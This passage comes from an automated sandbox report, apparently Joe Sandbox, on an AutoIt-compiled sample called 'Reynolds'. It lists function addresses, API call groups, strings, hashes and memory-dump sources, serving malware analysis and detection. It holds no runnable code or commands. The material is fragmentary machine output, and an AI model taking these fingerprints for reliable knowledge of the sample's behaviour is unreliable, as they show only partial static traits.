                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                      • API String ID: 2595394609-2123141913
                                                                                                      • Opcode ID: 038fd8892ea4505ef95e7aff6c2d4318c30ef29dc954c6865875ce570fc3ca79
                                                                                                      • Instruction ID: 04b4d80557b02638dd494d2a906174b309f9fb383232fbe84ecace3f074c368b
                                                                                                      • Opcode Fuzzy Hash: 038fd8892ea4505ef95e7aff6c2d4318c30ef29dc954c6865875ce570fc3ca79
                                                                                                      • Instruction Fuzzy Hash: FD418C77200E7483EA639F86E84C7982FA0F784BC0F544592CE9A977A3DA39C9C1C340
                                                                                                      Function 00007FF7AA16B400 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconLoad_invalid_parameter_noinfo
                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                      • API String ID: 4060274358-404129466
                                                                                                      • Opcode ID: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                                                                                                      • Instruction ID: 74ad813c167c4f4b7c451bad72653ed0343d09ebb897e01adf549144a15c9e8c
                                                                                                      • Opcode Fuzzy Hash: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                                                                                                      • Instruction Fuzzy Hash: 96216D21A4E782E1FA12BB16F94017AE271AF447C0F8650B5DD0E867B6DF7CE8038321
                                                                                                      Function 00007FF7AA16CC44 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                      • API String ID: 4051287042-3128320259
                                                                                                      • Opcode ID: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                                                                                                      • Instruction ID: 7d2be805b5a5d502c88c428a4a8743cb591baaba97c4943fd57c993d8883b33a
                                                                                                      • Opcode Fuzzy Hash: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                                                                                                      • Instruction Fuzzy Hash: 9B115271B1DB81E1E736AB10F4457EAA270FB88798FC1047AD64E42A68DE7CC156C760
                                                                                                      Function 00007FF7AA1A29E4 Relevance: 12.3, APIs: 8, Instructions: 254windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1211466189-0
                                                                                                      • Opcode ID: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                                                                                                      • Instruction ID: 6509c4bc33e8c1433bfe861c41e2a70644608689cb674bff870bdcdd7620f8a5
                                                                                                      • Opcode Fuzzy Hash: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                                                                                                      • Instruction Fuzzy Hash: 0EA1F27671A683E2F76AAF25E144779B6B0FB44B84F525075DA0A43AB0DF3CE8528310
                                                                                                      Function 00007FF7AA11428C Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1268545403-0
                                                                                                      • Opcode ID: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                                                                                                      • Instruction ID: 89eb89b5272c50dd45bd61e2240fa0caa8318eaf460e19437bad30f1164dd71e
                                                                                                      • Opcode Fuzzy Hash: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                                                                                                      • Instruction Fuzzy Hash: 5A51C9B1B1E193E5FB67BB29F44837C96759F81F44F9A40B9C50E422B5CE2CA486C324
                                                                                                      Function 00007FF7AA19991C Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3864802216-0
                                                                                                      • Opcode ID: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                                                                                                      • Instruction ID: c28e33d98efecb6b204d9cf9e9dfda54deedd9db487d4ace0aa17957707e9a7a
                                                                                                      • Opcode Fuzzy Hash: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                                                                                                      • Instruction Fuzzy Hash: 8141BB72619681DBE7218B22F440B6ABBB1F788BD5F554035EF8A07B68DF3DD4418B00
                                                                                                      Function 000002453CA272B0 Relevance: 10.9, APIs: 7, Instructions: 351COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: fputc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1992160199-0
                                                                                                      • Opcode ID: 57ca36df8b249a8f9d5f541ac5ada4a75b700afd3f56804cb7cb8ab337eae962
                                                                                                      • Instruction ID: a828610ea31b2b2ca24c7f33d726fc3b7e3d8cd5f7a513cd41f4cac8d5618b56
                                                                                                      • Opcode Fuzzy Hash: 57ca36df8b249a8f9d5f541ac5ada4a75b700afd3f56804cb7cb8ab337eae962
                                                                                                      • Instruction Fuzzy Hash: F2E14133200A718BF7768E1AD599B6ABBF1E744792F444199CFD7C6AC2D628E9C1C700
                                                                                                      Function 00007FF7AA130A4C Relevance: 10.8, APIs: 7, Instructions: 294COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                                                                                                      • Instruction ID: 9cc0728cf2781fec62ed7013d006435687a016e4d12af6c78d0e1726960b7071
                                                                                                      • Opcode Fuzzy Hash: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                                                                                                      • Instruction Fuzzy Hash: 4EC1D722E0E682D5FAEAAF15F44027DAAF1AF40790F964175DA4E077B5CE3DE4468330
                                                                                                      Function 00007FF7AA171250 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • #77.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA17133B
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA171391
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA171478
                                                                                                      • #24.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA17149F
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA1714B0
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA17151E
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF7AA170CA8,?,?,00000000,00007FF7AA1886CF), ref: 00007FF7AA171593
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                                                                                                      • Instruction ID: bd44453023475d90d9e0fc0fb14a7ed7def4b5ae19396ffb744fdd8ab1da8929
                                                                                                      • Opcode Fuzzy Hash: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                                                                                                      • Instruction Fuzzy Hash: 72A1CF32E0A612E5FB12AB55E4403BCA771BB44B94F866075DE0E576B1EF3CD842CB60
                                                                                                      Function 00007FF7AA0F1E2C Relevance: 10.7, APIs: 7, Instructions: 246COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                      • String ID:
                                                                                                      • API String ID: 3225163088-0
                                                                                                      • Opcode ID: d06d4cd1a423281fa7bfc3dd395589592d26c066c60ef58400709c52517d685a
                                                                                                      • Instruction ID: 3747ed4540f5cf73a98db7a24d1a0fdae0e0151591d23297b352def3cfaf7607
                                                                                                      • Opcode Fuzzy Hash: d06d4cd1a423281fa7bfc3dd395589592d26c066c60ef58400709c52517d685a
                                                                                                      • Instruction Fuzzy Hash: FCA1DE73A0D2C2C7E7649F19A44066EFB71FB89B98F910125EA8913B69DB3CD452CB10
                                                                                                      Function 000002453CA26970 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 234COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: fputc$memset
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 2944404495-4108050209
                                                                                                      • Opcode ID: 723778ab5f5ed4e9e21dd96fdce46ca5edcb99c65d494b752cf8bca5d62af410
                                                                                                      • Instruction ID: b58d599bfab7c8031eaf55b20d701a805e026b5c3310f1a85621df41d5d3415c
                                                                                                      • Opcode Fuzzy Hash: 723778ab5f5ed4e9e21dd96fdce46ca5edcb99c65d494b752cf8bca5d62af410
                                                                                                      • Instruction Fuzzy Hash: 8D811363B42AB447F73B9E26E18877E6EE2E714790F049195CEE756AC3D238D8C08700
                                                                                                      Function 00007FF7AA1A02A8 Relevance: 10.7, APIs: 7, Instructions: 212windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendWindow$Enabled
                                                                                                      • String ID:
                                                                                                      • API String ID: 3694350264-0
                                                                                                      • Opcode ID: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                                                                                                      • Instruction ID: 2eda33ff800c8b5b4a3815e265ad6bdfc98527a981c7024f3839f560447fc382
                                                                                                      • Opcode Fuzzy Hash: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                                                                                                      • Instruction Fuzzy Hash: 9B91B671E0AA46EAF7F6AB15F4403B9B3B1AF44754F864072CA4C036B1DE3DE5968720
                                                                                                      Function 00007FF7AA19B0F8 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                      • String ID:
                                                                                                      • API String ID: 161812096-0
                                                                                                      • Opcode ID: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                                                                                                      • Instruction ID: 6fc7b9114c4a697826da64adb95d052e36186b21e18b05c708003620d7fee922
                                                                                                      • Opcode Fuzzy Hash: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                                                                                                      • Instruction Fuzzy Hash: 8B413836A0AB01E5F751AF62E4806AC77B6FB84B98F964076DE0D53764CF38E446C710
                                                                                                      Function 00007FF7AA19B754 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                      • String ID: Msctls_Progress32
                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                      • Opcode ID: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                                                                                                      • Instruction ID: 3fc1b201e252340ac490708cea2ad1ab25e1a817fa8ce140feb082634db30428
                                                                                                      • Opcode Fuzzy Hash: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                                                                                                      • Instruction Fuzzy Hash: 51315736A0D691DBE3609F25F494B1AB761EB88794F509239EB8903F68CF3CD446CB10
                                                                                                      Function 00007FF7AA0F3E24 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Create$Show
                                                                                                      • String ID: AutoIt v3$d$edit
                                                                                                      • API String ID: 2813641753-2600919596
                                                                                                      • Opcode ID: 0ad88fc629bd0e984a014ea89d123ec5e352ad141f26ec72c70a003d1c95128a
                                                                                                      • Instruction ID: d7971d46acedb8f5e775292f1c2d7c63a76e59569967e39d556f518b20edbeb6
                                                                                                      • Opcode Fuzzy Hash: 0ad88fc629bd0e984a014ea89d123ec5e352ad141f26ec72c70a003d1c95128a
                                                                                                      • Instruction Fuzzy Hash: 79214972A19B41DBF751DB10F448369B3B0F7887A9F920238E68D46A64CF7DD145CB14
                                                                                                      Function 00007FF7AA0FD6F0 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 3220332590-0
                                                                                                      • Opcode ID: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                                                                                                      • Instruction ID: 9fe2cd5850a5e85ce89957eacb3e9e853d459da3fca83fb477540ae332bd4bf6
                                                                                                      • Opcode Fuzzy Hash: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                                                                                                      • Instruction Fuzzy Hash: 74A101A7A1A253C6F725AF75D4407BEB3B0FB04B18F415036DE1A57AA4FA399802D320
                                                                                                      Function 00007FF7AA119EE4 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
